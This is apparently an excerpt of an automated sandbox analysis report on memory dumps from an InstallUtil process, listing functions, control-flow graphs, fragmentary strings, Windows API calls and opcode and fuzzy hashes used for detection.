                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1646ca7cde855ccfbcc98c63ef12ae1a5a54941760399f2f640358fb926fc399
                                • Instruction ID: 3c273e3615c2aa38a34d49ec7b4dff3acb2aaf0cc8d0d0c13b573277e1c1aacc
                                • Opcode Fuzzy Hash: 1646ca7cde855ccfbcc98c63ef12ae1a5a54941760399f2f640358fb926fc399
                                • Instruction Fuzzy Hash: 1D63F631D10B1A8ACB51EB68C8846A9F7B1FF99300F11D79AE45877121FB70AAD4CF81
                                Function 067596A8 Relevance: 1.9, Strings: 1, Instructions: 621COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: $
                                • API String ID: 0-3993045852
                                • Opcode ID: 7d04d92a23959dfd39bb3db8f4c09660cac40e38a7623fc784dd746976c657b2
                                • Instruction ID: 7e0baf407dc596a2d7de4adba7cbe05a5a237d613ff230ba84275d3d218ad23d
                                • Opcode Fuzzy Hash: 7d04d92a23959dfd39bb3db8f4c09660cac40e38a7623fc784dd746976c657b2
                                • Instruction Fuzzy Hash: 0822CE31E00249DFDB64DFA4C4806AEB7F2EF85310F2584AADA49AB344DB75DD42CB91
                                Function 0675F7A0 Relevance: 17.9, Strings: 14, Instructions: 417COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1384 675f7a0-675f7be 1385 675f7c0-675f7c3 1384->1385 1386 675f7c5-675f7d2 1385->1386 1387 675f7d7-675f7da 1385->1387 1386->1387 1388 675f7dc-675f7e9 1387->1388 1389 675f7ee-675f7f1 1387->1389 1388->1389 1391 675f7f3-675f7f7 1389->1391 1392 675f802-675f805 1389->1392 1396 675f9e7-675f9f1 1391->1396 1397 675f7fd 1391->1397 1393 675f9d8-675f9e1 1392->1393 1394 675f80b-675f80e 1392->1394 1393->1396 1400 675f853-675f85c 1393->1400 1398 675f831-675f834 1394->1398 1399 675f810-675f82c 1394->1399 1397->1392 1401 675f836-675f849 1398->1401 1402 675f84e-675f851 1398->1402 1399->1398 1403 675f9f2-675f9fd 1400->1403 1404 675f862-675f866 1400->1404 1401->1402 1402->1400 1406 675f86b-675f86e 1402->1406 1416 675fa4c-675fa4d 1403->1416 1417 675f9ff-675fa05 1403->1417 1404->1406 1409 675f870-675f875 1406->1409 1410 675f878-675f87a 1406->1410 1409->1410 1411 675f881-675f884 1410->1411 1412 675f87c 1410->1412 1411->1385 1414 675f88a-675f8b4 1411->1414 1412->1411 1452 675f9d5 1414->1452 1453 675f8ba-675f8cf 1414->1453 1419 675fce7-675fcea 1416->1419 1420 675fa51 1416->1420 1429 675f995-675f997 1417->1429 1430 675fa07-675fa26 1417->1430 1422 675fcec-675fcf0 1419->1422 1423 675fcfb-675fcfe 1419->1423 1421 675fa53-675fa8e 1420->1421 1443 675fa94-675faa0 1421->1443 1444 675fcb2-675fcc5 1421->1444 1422->1421 1426 675fcf6 1422->1426 1427 675fd21-675fd23 1423->1427 1428 675fd00-675fd1c 1423->1428 1426->1423 1432 675fd25 1427->1432 1433 675fd2a-675fd2d 1427->1433 1428->1427 1434 675f981-675f985 1429->1434 1435 675f998-675f999 1429->1435 1431 675fa28-675fa2b 1430->1431 1437 675fa2d-675fa37 1431->1437 1438 675fa38-675fa3b 1431->1438 1432->1433 1433->1431 1441 675fd33-675fd3d 1433->1441 1439 675f987-675f98d 1434->1439 1440 675f99d-675f9ce 1434->1440 1435->1440 1446 675fa3d 1438->1446 1447 675fa4a 1438->1447 1448 675f991-675f993 1439->1448 1449 675f98f 1439->1449 1440->1452 1459 675fac0-675fb04 1443->1459 1460 675faa2-675fabb 1443->1460 1450 675fcc7 1444->1450 1457 675fa43-675fa45 1446->1457 1447->1416 1448->1429 1449->1440 1450->1419 1452->1393 1465 675f8e7-675f921 1453->1465 1466 675f8d1-675f8d7 1453->1466 1457->1447 1478 675fb06-675fb18 1459->1478 1479 675fb20-675fb5f 1459->1479 1460->1450 1486 675f923-675f929 1465->1486 1487 675f939-675f956 1465->1487 1467 675f8d9 1466->1467 1468 675f8db-675f8dd 1466->1468 1467->1465 1468->1465 1478->1479 1484 675fb65-675fc71 1479->1484 1485 675fc77-675fc8c 1479->1485 1484->1485 1485->1444 1490 675f92d-675f92f 1486->1490 1491 675f92b 1486->1491 1498 675f96e-675f97c 1487->1498 1499 675f958-675f95e 1487->1499 1490->1487 1491->1487 1498->1434 1500 675f960 1499->1500 1501 675f962-675f964 1499->1501 1500->1498 1501->1498
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'J\-$CH\-$VJ\-$WH\-$[H\-$|J\-$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-3957607802
                                • Opcode ID: 6aaeab8caea19bba9946839a573bf5ab79e0a7479bd28999c4b2a4dc63bd7c5a
                                • Instruction ID: 532d60dd22282c77df84188a429249546b7c71d90b83feba211006b91684bfa4
                                • Opcode Fuzzy Hash: 6aaeab8caea19bba9946839a573bf5ab79e0a7479bd28999c4b2a4dc63bd7c5a
                                • Instruction Fuzzy Hash: 77E17230F0020A9FDF68DFA8D8906AEB7F6FF85210F118569D805EB354DB789846CB81
                                Function 0675D918 Relevance: 11.5, Strings: 9, Instructions: 280COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1766 675d918-675d93d 1767 675d93f-675d942 1766->1767 1768 675d944-675d963 1767->1768 1769 675d968-675d96b 1767->1769 1768->1769 1770 675d971-675d9b1 1769->1770 1771 675e3ad-675e3af 1769->1771 1780 675d9b3-675d9bf 1770->1780 1781 675d9db 1770->1781 1773 675e3b6-675e3b9 1771->1773 1774 675e3b1 1771->1774 1773->1767 1775 675e3bf-675e3c9 1773->1775 1774->1773 1782 675d9c1-675d9c7 1780->1782 1783 675d9c9-675d9cf 1780->1783 1784 675d9e1-675da17 1781->1784 1785 675d9d9 1782->1785 1783->1785 1789 675da22-675da24 1784->1789 1785->1784 1790 675da26-675da2c 1789->1790 1791 675da3c-675dac5 1789->1791 1792 675da30-675da32 1790->1792 1793 675da2e 1790->1793 1803 675dac7-675db03 1791->1803 1804 675db0a-675db40 1791->1804 1792->1791 1793->1791 1803->1804 1811 675db85-675dbbb 1804->1811 1812 675db42-675db7e 1804->1812 1819 675dc00-675dc36 1811->1819 1820 675dbbd-675dbf9 1811->1820 1812->1811 1827 675dc38-675dc74 1819->1827 1828 675dc7b-675dc89 1819->1828 1820->1819 1827->1828 1829 675dc99-675dd10 1828->1829 1830 675dc8b-675dc94 1828->1830 1837 675dd12-675dd36 1829->1837 1838 675dd69-675dd7e 1829->1838 1830->1775 1843 675dd58-675dd67 1837->1843 1844 675dd38-675dd4d 1837->1844 1838->1771 1843->1837 1843->1838 1844->1843
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$$]q$$]q$$]q$$]q$u\-
                                • API String ID: 0-2036382028
                                • Opcode ID: 049b4d2f94642b55dfd02f88b07009d0ba9f2ce6f1da62a2a8ebf4273a5898fe
                                • Instruction ID: c92c57a89271084f406fed3386a92397818694666049b4d5d3f196e2793e9525
                                • Opcode Fuzzy Hash: 049b4d2f94642b55dfd02f88b07009d0ba9f2ce6f1da62a2a8ebf4273a5898fe
                                • Instruction Fuzzy Hash: CFC1EC70E0021A9FDB65DF65C8A17EEB7F2BF84340F1085A9C849A7354DA709E858F92
                                Function 0675D916 Relevance: 9.0, Strings: 7, Instructions: 206COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2003 675d916-675d93d 2004 675d93f-675d942 2003->2004 2005 675d944-675d963 2004->2005 2006 675d968-675d96b 2004->2006 2005->2006 2007 675d971-675d9b1 2006->2007 2008 675e3ad-675e3af 2006->2008 2017 675d9b3-675d9bf 2007->2017 2018 675d9db 2007->2018 2010 675e3b6-675e3b9 2008->2010 2011 675e3b1 2008->2011 2010->2004 2012 675e3bf-675e3c9 2010->2012 2011->2010 2019 675d9c1-675d9c7 2017->2019 2020 675d9c9-675d9cf 2017->2020 2021 675d9e1-675da17 2018->2021 2022 675d9d9 2019->2022 2020->2022 2026 675da22-675da24 2021->2026 2022->2021 2027 675da26-675da2c 2026->2027 2028 675da3c-675dac5 2026->2028 2029 675da30-675da32 2027->2029 2030 675da2e 2027->2030 2040 675dac7-675db03 2028->2040 2041 675db0a-675db40 2028->2041 2029->2028 2030->2028 2040->2041 2048 675db85-675dbbb 2041->2048 2049 675db42-675db7e 2041->2049 2056 675dc00-675dc36 2048->2056 2057 675dbbd-675dbf9 2048->2057 2049->2048 2064 675dc38-675dc74 2056->2064 2065 675dc7b-675dc89 2056->2065 2057->2056 2064->2065 2066 675dc99-675dd10 2065->2066 2067 675dc8b-675dc94 2065->2067 2074 675dd12-675dd36 2066->2074 2075 675dd69-675dd7e 2066->2075 2067->2012 2080 675dd58-675dd67 2074->2080 2081 675dd38-675dd4d 2074->2081 2075->2008 2080->2074 2080->2075 2081->2080
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: /t\-$7w\-$Ot\-$~w\-$$]q$$]q$u\-
                                • API String ID: 0-1014627357
                                • Opcode ID: c493b34d9e7608bd0580400b265367b3fd48c32e614b8545cb384ec27fcab3f1
                                • Instruction ID: 8e2c5499fe459e4e0cd5709ea7a891afd87f5c2337aaeceab626997ca0f62821
                                • Opcode Fuzzy Hash: c493b34d9e7608bd0580400b265367b3fd48c32e614b8545cb384ec27fcab3f1
                                • Instruction Fuzzy Hash: 0491D970E002199FDB65DBA4D8A1BEDB7F2BF48350F1084A9C40DA7354DA705E85CF92
                                Function 0675B270 Relevance: 4.0, Strings: 3, Instructions: 270COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'C\-$6C\-$@\-
                                • API String ID: 0-4261662283
                                • Opcode ID: 27646f3ffe46b94e79059d26a5895ca183ad65a105c663b6e580a8e3987a5bfa
                                • Instruction ID: af2ce2df329ae00d652dd8be85c6866a71e9794a05e11a731a07b4d2d5744871
                                • Opcode Fuzzy Hash: 27646f3ffe46b94e79059d26a5895ca183ad65a105c663b6e580a8e3987a5bfa
                                • Instruction Fuzzy Hash: C2A18E30A002049FCB68DB68C554A7DB7F2EF84754F55C5A9D81AAB350DBB5EC86CB80
                                Function 06758361 Relevance: 4.0, Strings: 3, Instructions: 245COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: 8456c2755eef1e64ace85dc36ff0e969a2fdd34dd64318ff914ba99e5a418f9f
                                • Instruction ID: 98f8139e65bcc85068778c1d9b26e6d04e304d64a1887891929492a79a6d1315
                                • Opcode Fuzzy Hash: 8456c2755eef1e64ace85dc36ff0e969a2fdd34dd64318ff914ba99e5a418f9f
                                • Instruction Fuzzy Hash: 51817030B0021A5BDB58DFB8C4647AE76F6EF88344F118469D80AEB384EE74DC468792
                                Function 06758370 Relevance: 4.0, Strings: 3, Instructions: 242COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9^\-$P_\-$Y_\-
                                • API String ID: 0-50222206
                                • Opcode ID: 2e8356dad02d5ac2cdde7173313f2588178879d47f723c04b8fa81b008d14d11
                                • Instruction ID: 02141b9dbf7263259825963c8db089f2e7c0704fa147f29e13b6871b46419f1c
                                • Opcode Fuzzy Hash: 2e8356dad02d5ac2cdde7173313f2588178879d47f723c04b8fa81b008d14d11
                                • Instruction Fuzzy Hash: 36816030B0021A5BDB58DFB8C4647AE76F7EF88354F118469D80AEB385EE74DC468792
                                Function 06758C70 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$XPbq$\Obq
                                • API String ID: 0-4057264190
                                • Opcode ID: b1215d87094b73098cbde3ebb629a608035122e59a2d712f97165ba52323b263
                                • Instruction ID: c2bc894d5c33ec19e31753b22a354502674e37994f928719b48d8ed0d755cbbd
                                • Opcode Fuzzy Hash: b1215d87094b73098cbde3ebb629a608035122e59a2d712f97165ba52323b263
                                • Instruction Fuzzy Hash: 3D519470F001199FEB649BA4C8547BEBAF6FF88740F108469E506EB394DEB44D059B92
                                Function 06758C61 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: fbq$XPbq
                                • API String ID: 0-2292610095
                                • Opcode ID: 63531394da9a77ced81e5dd38f7b95e7231b85203e9103811e338f3a726fddaa
                                • Instruction ID: c1bc3ef0773c6e09fe0f2e8412cc8f4413ebdf9ced9b02b82f9814cc083d5ad8
                                • Opcode Fuzzy Hash: 63531394da9a77ced81e5dd38f7b95e7231b85203e9103811e338f3a726fddaa
                                • Instruction Fuzzy Hash: CC41B670B001199FEB549FA4C864BAE7AF7EF84740F108569E545EB3D4DEB48C018B92
                                Function 06757F08 Relevance: 2.6, Strings: 2, Instructions: 124COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 9f02a03719250ce1f5da59c73395dc0f4cf50bff6d6956bce60a24030cb5d0e4
                                • Instruction ID: 5e011e2716b4304236f5704f376fd8d312d0cdc67c11e3d3d306648cb9744bef
                                • Opcode Fuzzy Hash: 9f02a03719250ce1f5da59c73395dc0f4cf50bff6d6956bce60a24030cb5d0e4
                                • Instruction Fuzzy Hash: 7D41BE71F002199FDB54DFA8C4417EEBBF5EB48760F108069E849E7380DB749942CBA2
                                Function 0675B261 Relevance: 2.6, Strings: 2, Instructions: 104COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'C\-$6C\-
                                • API String ID: 0-952170732
                                • Opcode ID: 41d82da21955cb39f7d89ad942b6d08debb5fbc8e842602cb4076de3f7113603
                                • Instruction ID: c61f9ce02f9d62cb9a835f91616bb5e86db20ecee0e97b8c21aba3300a73666b
                                • Opcode Fuzzy Hash: 41d82da21955cb39f7d89ad942b6d08debb5fbc8e842602cb4076de3f7113603
                                • Instruction Fuzzy Hash: 3C316731F00118AFCF85DBB8D8756BD7BB2EF80250F0281A6D805EB245DA60DD06C792
                                Function 06757F18 Relevance: 2.6, Strings: 2, Instructions: 91COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 2cf20fc141e129eb49cc858fa4cc9948bbccc610ec89f45575413ccf079448eb
                                • Instruction ID: 012f80dcd032d714999a8e98ca28f10c844684a1658a8ee919d582e21f421a59
                                • Opcode Fuzzy Hash: 2cf20fc141e129eb49cc858fa4cc9948bbccc610ec89f45575413ccf079448eb
                                • Instruction Fuzzy Hash: 62319371F0011A5FDF54DBB884517EEB6F5AB48660F15C0A9D909F7380EA74CD02CBA2
                                Function 0675ECF0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: c4a8b63df2a45fb7339e12ca5c62e2eb21729c742f456b36e31cddbcae1964f9
                                • Instruction ID: e1c796155e443a3f522c99db621de7f5e327203a7ce13faaac2e1e16054fb3b6
                                • Opcode Fuzzy Hash: c4a8b63df2a45fb7339e12ca5c62e2eb21729c742f456b36e31cddbcae1964f9
                                • Instruction Fuzzy Hash: 0A110231F041040BDF6196BCE85137E7BF2DFCA224F2284AAE90EDB350DA64CD014382
                                Function 0675ED00 Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: 8f07987138e9a808acb7c4a3e69e5ee1ca89f021526708692a76b99a048313fa
                                • Instruction ID: e8340b9c9fc0f84180303fd581697a9dc152ab9ea1a59ef4002747725c950af7
                                • Opcode Fuzzy Hash: 8f07987138e9a808acb7c4a3e69e5ee1ca89f021526708692a76b99a048313fa
                                • Instruction Fuzzy Hash: 1E01FD30B002081BDF64A6BCD86573E72E6DFCA610F208829E90ECB350EE60DD0243C2
                                Function 066D4620 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292236886.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_66d0000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f3363f6ff18f0f04ce9dac6ba3217049a188dbcc8ad84b147c8753a21a17adac
                                • Instruction ID: 7a7c6274eef6f1285321f890e298f71e1c36fe886572b7985778fbd9a801d813
                                • Opcode Fuzzy Hash: f3363f6ff18f0f04ce9dac6ba3217049a188dbcc8ad84b147c8753a21a17adac
                                • Instruction Fuzzy Hash: D5413671D043959FCB14CF79D8046AEBFF5EF89310F14856AE408A7251EB789840CBE1
                                Function 0109C280 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286413123.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1090000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28b9103aa7010ce95310c2eb4c3dd8312481f9457b1dcc7392cb94f15dc1634b
                                • Instruction ID: 6bf252614216bebcfb98434d0cc8480318853975ef4a35a8f72c25dddcfa0feb
                                • Opcode Fuzzy Hash: 28b9103aa7010ce95310c2eb4c3dd8312481f9457b1dcc7392cb94f15dc1634b
                                • Instruction Fuzzy Hash: DD41A079A403419FF715EFA5E855B693FEBFB94340F10846EEA059B3C9CA744805CB60
                                Function 0109C1B9 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109C247
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286413123.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1090000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 935088a50477dda0b37f739e6251a7d07b0c25b7fef98444c51bf3f61dd6bfb0
                                • Instruction ID: 3a68bf3eb92e5f1cbfc1e3dbcac496eb3312ca56dbb62444df91aa8635467275
                                • Opcode Fuzzy Hash: 935088a50477dda0b37f739e6251a7d07b0c25b7fef98444c51bf3f61dd6bfb0
                                • Instruction Fuzzy Hash: AC314AB59012089FDB10CF9AD945ADEBFF8FF48310F10806AE958A7210D7749944DFA0
                                Function 0109C1C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0109C247
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286413123.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1090000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 27ef0cfb1a2bbb1f1787ec4a46137d386aeff0276539ccab5c24d2f4f11e26dc
                                • Instruction ID: 899d32a31edaadb1ab078dcde75d6727f3f946046ddf43b178639f8d89e90293
                                • Opcode Fuzzy Hash: 27ef0cfb1a2bbb1f1787ec4a46137d386aeff0276539ccab5c24d2f4f11e26dc
                                • Instruction Fuzzy Hash: 5621E2B5D002489FDB10CFAAD984ADEBFF9FB48310F14805AE918A3310D378A940CFA0
                                Function 066D46F1 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066D4672), ref: 066D475F
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292236886.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_66d0000_InstallUtil.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 5b11c02956b96b79dcd122753743cc82ab520ff2a3b469090e8219dfe3d5285e
                                • Instruction ID: b893c8ce977272f021a78c79b79ddb1331706f90592e348259de02cb37fe7328
                                • Opcode Fuzzy Hash: 5b11c02956b96b79dcd122753743cc82ab520ff2a3b469090e8219dfe3d5285e
                                • Instruction Fuzzy Hash: 371133B1C00659ABDB10DFAAC844ADEFBF4FF48310F10816AE818A7240D778A940CFE1
                                Function 066D39D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,066D4672), ref: 066D475F
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292236886.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_66d0000_InstallUtil.jbxd
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID:
                                • API String ID: 1890195054-0
                                • Opcode ID: 43db37d382aeafe3dcbdefe14d43c08053ab911fe23f6b0cb67f5968a5ef4b72
                                • Instruction ID: d0bbefdcc4ddbc301d42d671dde8568342bc1584e2f5e1f9885c018a4611c294
                                • Opcode Fuzzy Hash: 43db37d382aeafe3dcbdefe14d43c08053ab911fe23f6b0cb67f5968a5ef4b72
                                • Instruction Fuzzy Hash: 141112B1C006599BDB10DF9AC544BAEFBF4FF48320F11816AE818A7240D778A950CFE5
                                Function 06755E8D Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q
                                • API String ID: 0-3168235125
                                • Opcode ID: a88c38c81d4a3368fc4fb6cd90ca20d80149548cab64619d6071a296c0fbf487
                                • Instruction ID: 8070566e40c9f3f4d7c157ea3c9f152fdf42abe361ea4265c666682c86a07141
                                • Opcode Fuzzy Hash: a88c38c81d4a3368fc4fb6cd90ca20d80149548cab64619d6071a296c0fbf487
                                • Instruction Fuzzy Hash: 37416730B002055FDB49AB74C4246AF3BE6EF85250F1584B9E446DB399DE79CD06CBE1
                                Function 06755EC0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: PH]q
                                • API String ID: 0-3168235125
                                • Opcode ID: e962260504416ce07be5903135141e83a92a7c9d35541c5fb275d895b376e684
                                • Instruction ID: f58ba416b5e220a7ef8d6369b850a9f7dcc80cd9805a706519e21b8683f99230
                                • Opcode Fuzzy Hash: e962260504416ce07be5903135141e83a92a7c9d35541c5fb275d895b376e684
                                • Instruction Fuzzy Hash: 57311430B002059FDB58AB78C42066E76E7AFC8250F61847DE406DB399DE79DD42CB91
                                Function 0675EDA0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-
                                • API String ID: 0-3816466299
                                • Opcode ID: 0b3d65dd4037994fbc3e00214767b47f446dc547ec6b3f62e0744bcff91f44af
                                • Instruction ID: 631890018775cf3c299608696bc5fb21323142d26eefbe93850dda76510f317b
                                • Opcode Fuzzy Hash: 0b3d65dd4037994fbc3e00214767b47f446dc547ec6b3f62e0744bcff91f44af
                                • Instruction Fuzzy Hash: BE31F531F102194BDB54AEB9D8502EEB7E6EFC4710F11857AE90AE7344EE74DE418391
                                Function 0675C9BB Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q
                                • API String ID: 0-1007455737
                                • Opcode ID: 221e3b5cbdcf6450d25105760dde2059c8923373b5313eef171f39175de0fde6
                                • Instruction ID: 957df482b5f58e68f279c46d5404858df006fe2a3eee9e75d5c249151636953d
                                • Opcode Fuzzy Hash: 221e3b5cbdcf6450d25105760dde2059c8923373b5313eef171f39175de0fde6
                                • Instruction Fuzzy Hash: 2601A731F002159B9F5AD598A59137C76E5EB80590F1680AECD09DB245DEB5CD068391
